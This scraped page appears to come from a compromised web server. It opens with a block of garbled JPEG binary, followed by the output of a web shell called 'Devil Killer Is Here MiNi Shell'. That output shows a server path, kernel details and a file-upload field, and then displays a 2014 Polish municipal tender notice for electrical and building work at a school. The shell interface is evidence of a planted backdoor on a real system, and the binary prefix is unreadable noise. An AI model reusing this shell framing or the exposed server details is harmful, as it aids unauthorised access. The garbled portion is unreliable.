JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140523/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140523/110889-N-2014.html

<p class="kh_header"><b>Czarna Białostocka: Modernizacja instalacji elektrycznej 
i niskoprądowej oraz wykonanie niezbędnych prac budowlanych po modernizacji instalacji w Gimnazjum im. Jana Pawła II przy ul. Prusa 1 w Czarnej Białostockiej</b><br>
<b>Numer ogłoszenia: 110889 - 2014; data zamieszczenia: 23.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Czarna Białostocka reprezentowana przez Burmistrza Czarnej Białostockiej , ul. Traugutta 2, 16-020 Czarna Białostocka, woj. podlaskie, tel. 85 7131340, faks 85 7131349.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czarnabialostocka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja instalacji elektrycznej 
i niskoprądowej oraz wykonanie niezbędnych prac budowlanych po modernizacji instalacji w Gimnazjum im. Jana Pawła II przy ul. Prusa 1 w Czarnej Białostockiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są roboty budowlane polegające na modernizacji instalacji elektrycznych (zasilania, oświetlenia, gniazd wtykowych i połączeń wyrównawczych) oraz instalacji niskoprądowych dedykowanych dla trzech sal lekcyjnych (II piętra Gimnazjum im. Jana Pawła II przy ul. B. Prusa 1 w Czarnej Białostockiej - nr sal dydaktycznych z rzutu dokumentacji projektowej - 3.9, 3.15, 3.16) wraz z wykonaniem prac budowlanych po wykonaniu modernizacji instalacji elektrycznych. W ramach powyższego zadania należy wykonać w szczególności:
1)	instalacja elektryczna:
a)	demontaż gniazd wtykowych - szt. 7, łączników - szt. 4, puszek i odgałęźników - szt. 3, opraw oświetleniowych świetlówkowych z kloszem - szt. 24,
b)	wykonanie instalacji oświetleniowej, gniazd wtykowych oraz połączeń wyrównawczych w postaci ułożenia przewodów kabelkowych YDY3x1,5mm2 - 200 mb, YDYżo3x1,5mm2 - 134 mb, YDYżo3x2,5mm2 - 407 mb w wykonanych bruzdach wraz z zaprawieniem bruzd, dostawa i montaż opraw oświetleniowych świetlówkowych np. Basic202EB 4x18W - 32 kpl., dostawa i montaż puszek instalacyjnych podtynkowych średnicy do 60 mm - szt. 3, pojedynczych podtynkowych o średnicy do 60 mm - szt.23, dostawa i montaż puszek instalacyjnych podtynkowych o średnicy do 80 mm o trzech wylotach - szt. 8, dostawa i montaż ramek 
5-krotnych do gniazd wtykowych - szt. 3, dostawa i montaż gniazd instalacyjnych wtyczkowych ze stykiem ochronnym, podtynkowych 2-biegunowych, przelotowych podwójnych o obciążalności do 16A i przekroju przewodów do 2,5 mm2 - szt. 17, dostawa i montaż gniazd wtykowych, potrójnych DATA z kluczem, z bolcem ochronnym montowanych w potrójnej ramce i przekroju przewodów do 2,5 mm2 - szt. 3, dostawa i montaż łączników świecznikowych podtynkowych - szt. 5, wykonanie pomiarów obwodów elektrycznych niskiego napięcia 
- 7 pomiarów, wykonanie sprawdzeń samoczynnego wyłączania zasilania - 5 prób;
2)	sieć niskoprądowa - internetowa - okablowanie strukturalne:
a)	dostawa i montaż głównego punktu dystrybucyjnego (montaż w sali dydaktycznej - nr z rzutu dokumentacji projektowej 3.21) na bazie szafy stojącej 19cali/42U 800x1000 - 1 kpl., wyposażonej w panel wentylacyjny 4-wentylatorowy z termostatem - 1 kpl., listwą zasilającą 8-portową z bolcem i wyłącznikiem zasilania - 1 kpl., panelem krosowym, telefonicznym, 25 porów RJ45 kategorii 3 - 1 kpl., magazynem VOICE typu UK 19cali/1u na 60 par (3x2) - 1 kpl., łączówką rozłączną LSA-PLUS 2/10 - 1 kpl., panelem porządkującym 19cali/1U - 8 kpl., pólkami ruchomymi 400 mm 19cali/1U - 2 kpl., przełącznikiem 48 portów np. Switch AT-8948 - 3 kpl., porty światłowodowe np. AT-SPSX - 4 kpl., centrali telefonicznej kompletnej w obudowie np. KX-NCP500NE - 1 kpl., podtrzymanie bateryjne - UPS np. KR2000J 2000VA 230V - 1 kpl., z baterią akumulatorów np. MBKR-J2 - 1 kpl., montażem kabli krosowych RJ45-RJ45 U/UTP kat.6, 1 b - 24 szt, 2 mb - 72 szt., 3 mb - 60 szt., 
b)	dostawa i montaż instalacji logicznej - punkty przyłączeniowe w postaci: puszek bakelitowych o średnicy do 60 mm z ramkami 1 krotnymi - szt. 3 i rewizyjnych - szt. 3, gniazd RJ45 w kat. 6 UTP, 568A/B - szt. 6 z adapterem gniazda 45x22,5 mm - szt. 6 z przewodami U/UTP 
4x2x0,5 mm kat.6 o dł. 3 mb - kpl. 3,
c)	dostawa i montaż instalacji logicznej w postaci przewodów kablowych YTKZYekw 
5x4x0,5 mm - 5 mb, U/UTP 4x2x0,5mm kat.6 - 410 mb w rurach winidurowych karbowanych (giętkich) typu RKGL50 - 105 mb oraz RKGL32 - 35 mb, układanych w przygotowanych bruzdach z zaprawieniem i malowaniem bruzd po wykonaniu instalacji oraz dokonaniu pomiarów końcowych prądem stałym;
3)	roboty budowlane w salach dydaktycznych nr 28 (biologia), 29 (matematyka), 30 (język polski):
a)	posadzki:
	rozebranie posadzek drewnianych - ok. 176,29 m2,
	frezowanie powierzchni betonowych - ok. 176,29 m2,
	usunięcie gruzu i śmieci - ok. 1,0 m3,
	gruntowanie powierzchni poziomych gruntem dyspersyjno-cementowym - ok. 176,29 m2,
	wykonanie warstw wyrównujących i wygładzających z zaprawy samopoziomującej grubości do 5 mm - ok. 176,29 m2,
	wyłożenie wykładzin PVC homogenicznych z wywinięciem na ścianę 10 cm - 
ok. 240,32 m2,
	zgrzewanie wykładzin rulonowych - ok. 240,32 m2,
	wykonanie listew przyściennych klejonych do wyoblenia naroży - ok. 101,56 m,
b)	ściany:
	wykonanie osłon okien folią polietylenową - ok. 33,00 m2,
	demontaż wyposażenia sal - 3 kpl.,
	mechaniczne cięcie podokienników - wyrównanie do glefów - ok. 17,00 mb,
	odbicie tynków na ścianach, filarach, pilastrach z zaprawy cementowo-wapiennej - ok. 16,04 m2,
	wykucie z muru ościeżnic drewnianych o powierzchni do 2,0 m2 - 4 szt.,
	wykucie z muru kratek wentylacyjnych - 9 szt.,
	skucie występów na ścianach z cegieł na zaprawie cementowo-wapiennej - ok. 5,43 m2,
	usunięcie gruzu i śmieci - ok. 0,9 m3,
	wykonanie tynków wewnętrznych kat. II na ścianach płaskich i słupach prostokątnych z cegieł, pustaków ceramicznych, gazo- i pianobetonowych z zaprawy cementowo-wapiennej - ok. 16,04 m2,
	wykonanie pasów z tynku kat III na murach z cegieł lub ścianach z betonu pokrywających bruzdy uprzednio zamurowane i ościeży - ok. 20,4 m2,
	przetarcie istniejących tynków wewnętrznych z zeskrobaniem farby lub zdzieraniem farby - ok. 300,46 m2,
	gruntowanie powierzchni ścian - ok. 315,97 m2,
	ochrona narożników wypukłych kątownikiem aluminiowym z siatką na gipsie - ok. 102,2 m,
	gładzie gipsowe na ścianach,2- warstwowe - ok. 322,65 m2,
	dwukrotne malowanie farbami emulsyjnymi akrylowymi podłoży gipsowych - ok. 
314,42 m2,
	licowanie ścian płytkami 20x20 na klej metodą zwykłą - 1,92 m2,
	malowanie figur geometrycznych -1 kpl.,
	- dostawa i montaż odboi winylowych systemowych szer. 30 cm - ok. 41,49 m,
	- dostawa i montaż narożników ochronnych winylowych 5x5x200cm systemowych na korytarzu i w ościeżnicach drzwi wejściowych do magazynu - 8 szt.,
	dostawa i montaż relingów naściennych - 8,75 m,
	dostawa i montaż fototapety laminowanej 2,71 x 2,85 m - 1 kpl.,
	dostawa i montaż ościeżnic stalowych, systemowych RW=27 dB 90 - 3 szt.,
	dostawa i montaż ościeżnic stalowych 80 - 1 szt.,
	dostawa i montaż skrzydeł drzwiowych płytowych, wewnętrznych, fabrycznie wykończonych, pełnych (kolor- naturalny dąb) o izolacyjności akustycznej do poziomu RA1=25 dB, z klamkami bezpiecznymi na szyldzie długim z wkładką bębenkową - litera C, stal nierdzewna i kpl. Klucz, o wymiarach 90x200 - 5,4 m2,
	dostawa i montaż skrzydeł drzwiowych płytowych, wewnętrznych, fabrycznie wykończonych, pełnych z klamkami bezpiecznymi na szyldzie długim z wkładką bębenkową - litera C, stal nierdzewna i kpl. Kluczy, o wymiarach 80x200 - 1,6 m2,
	dostawa i montaż na podokiennikach nakładek renowacyjnych PVC 150x25cm w kolorze białym - 11 kpl.,
	dostawa i montaż kratek wentylacyjnych PCW bez żaluzji - 9 szt.,
	rozebranie obić ścian - deski tynkowane - ok. 14,32 m2,
	wykonanie ścianek działowych z płyt kartonowo-gipsowych na rusztach metalowych pojedynczych z pokryciem obustronnym, 2-warstwowo - ok. 7,16 m2,
	wykonanie izolacji cieplnych i przeciwdźwiękowych z wełny mineralnej, pionowych z płyt układanych na sucho grubości 5 cm w ścianach działowych - ok. 7,16 m2,
c)	sufity:
	gruntowanie - ok. 172,10 m2,
	wykonanie gładzi gipsowych na sufitach,2-warstwowe - ok. 172,10 m2,
	dwukrotne malowanie farbami emulsyjnymi podłoży gipsowych z gruntowaniem - ok. 192,01 m2,
d)	roboty dodatkowe:
	dostawa i montaż rolet okiennych w kasetach - 22 kpl.,
	demontaż i ponowny montaż grzejników stalowych płytowych - 11 kpl.,
	malowanie farbami ftalowymi elementów metalowych - powierzchnie pełne i rurociągów o średnicy do 50 mm - dwukrotnie - 48,20 m2,
	demontaż umywalki - 1 kpl.,
	dostawa i montaż umywalki pojedynczej porcelanowej z syfonem gruszkowym na szafce pod umywalkę (jednodrzwiowa) - 1 kpl.,
	demontaż baterii umywalkowej - szt. 1,
	dostawa i montaż baterii umywalkowej stojącej, jedno uchwytowej - 1 szt., 
	demontaż zaworu czerpalnego - 2 szt.,
	dostawa i montaż zaworów do baterii stojącej - 2 szt.
2.	Uwagi Zamawiającego
1)	Zamawiający informuje, że w roku 2012 wykonano montaż nowej instalacji zasilającej obiekt Gimnazjum wraz ze wszystkimi rozdzielnicami. Do powyższych rozdzielnic elektrycznych podłączono istniejące instalacje elektryczne.
2)	W ramach realizacji ww. zadania należy wykonać nowe instalacje we wskazanych 3 salach dydaktycznych i wpiąć do rozdzielni wykonanej w 2012 roku.
3)	Zdemontowane elementy wyposażenia sal dydaktycznych w tym oprawy oświetleniowe, wyłączniki, gniazda wtykowe, tablice szkolne, skrzydła drzwiowe itp. należy złożyć w miejscu wskazanym przez zarządcę obiektu lub poddać utylizacji w oparciu o pisemną zgodę zarządcy obiektu, którą to zgodę należy załączyć do operatu powykonawczego z realizacji zadania.
3.	Szczegółowy zakres prac objętych zamówieniem zawierają stanowiące załączniki do niniejszej specyfikacji:
1)	dokumentacja projektowa,
2)	specyfikacje techniczne wykonania i odbioru robót (STWiOR), 
3)	przedmiar robót (który należy traktować jako materiał pomocniczy),
w przypadku, gdy w opisie zamówienia zostało wskazane pochodzenie (marka, znak towarowy, producent, dostawca) materiałów i urządzeń, Zamawiający dopuszcza oferowanie materiałów i urządzeń równoważnych, pod warunkiem, że gwarantują one realizację robót w zgodzie z Prawem budowlanym i odpowiednimi normami, zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w opisie zamówienia oraz zostaną one wcześniej zaakceptowane przez Zamawiającego.
4.	Projekty budowlane oraz specyfikacje techniczne wykonania i odbioru robót w wersji papierowej dostępne są w siedzibie Zamawiającego.
5.	W niniejszym postępowaniu przewidziano rozliczenie ryczałtowe, stąd załączone do SIWZ przedmiary robót pełnią rolę pomocniczą. W świetle powyższego obowiązkiem Wykonawcy jest uwzględnienie w cenie ryczałtowej wszystkich kosztów niezbędnych do wykonania całości przedmiotu zamówienia.
6.	Wykonawca zobowiązany jest do wyceny robót budowlanych stanowiących przedmiot niniejszego zamówienia wyłącznie z materiałów i urządzeń fabrycznie nowych, dopuszczonych do obrotu i powszechnego lub jednostkowego stosowania w budownictwie, objętych certyfikatem w zakresie tzw. znaku bezpieczeństwa, wskazującego na zgodność z Polską Normą, aprobatą techniczną i właściwymi przepisami technicznymi zgodnie z art. 10 ustawy z 07 lipca 1994 r. - Prawo budowlane (Dz. U. z 2010 r., Nr 243, poz. 1623 ze zm.)
7.	Każdy z Wykonawców ponosi pełną odpowiedzialność za skutki braku lub mylnego rozpoznania warunków realizacji zamówienia w zakresie możliwym do przewidzenia na etapie oferowania, na podstawie SIWZ i przedmiaru robót. Nie dotyczy to warunków niemożliwych do przewidzenia na etapie oferowania, w szczególności wynikających z błędów/braków w dokumentacji projektowej, napotkania znalezisk uniemożliwiających kontynuowanie robót, ujawnienia niezinwentaryzowanych lub błędnie zinwentaryzowanych instalacji, nietypowych warunków atmosferycznych i pozostałych okoliczności, które zostały przywołane we wzorze umowy.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.31.10.00-0, 45.45.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Ustala się wadium w wysokości 4.000,00 zł (słownie: cztery tysiące złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest wykazanie przez Wykonawcę realizacji, co najmniej 3 robót budowlanych polegających na wykonaniu, jako elementów zamówienia lub samoistnych zleceń, posadzek i tynków w ilości min. 500,00 m2, instalacji elektrycznych i niskoprądowych w ilości min. 1.000,00 mb w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest wykazanie przez Wykonawcę dysponowaniem kierownikiem budowy posiadającym uprawnienia do kierowania robotami branży budowlanej i elektrycznej</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest wykazanie przez Wykonawcę opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości min. 100.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych z wykorzystaniem załączonego wzoru;
2)	dowód wniesienia wadium;
3)	formularz ofertowy - wypełniony i podpisany przez Wykonawcę z wykorzystaniem wzoru stanowiącego załącznik do niniejszej specyfikacji;
4)	pełnomocnictwo lub umocowanie prawne upoważnionego przedstawiciela Wykonawcy, jeżeli taki został ustanowiony.
Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Pzp, polega na zasobach, innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, Wykonawca przedkłada:
1)	pisemne zobowiązania tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia;
2)	oświadczenie podmiotu składającego zobowiązanie o braku podstaw do wykluczenia go z postępowania;
3)	opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że podmiot składający zobowiązanie jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;
4)	dokumenty dotyczące w szczególności:
a)	zakresu dostępnych Wykonawcy zasobów innego podmiotu,
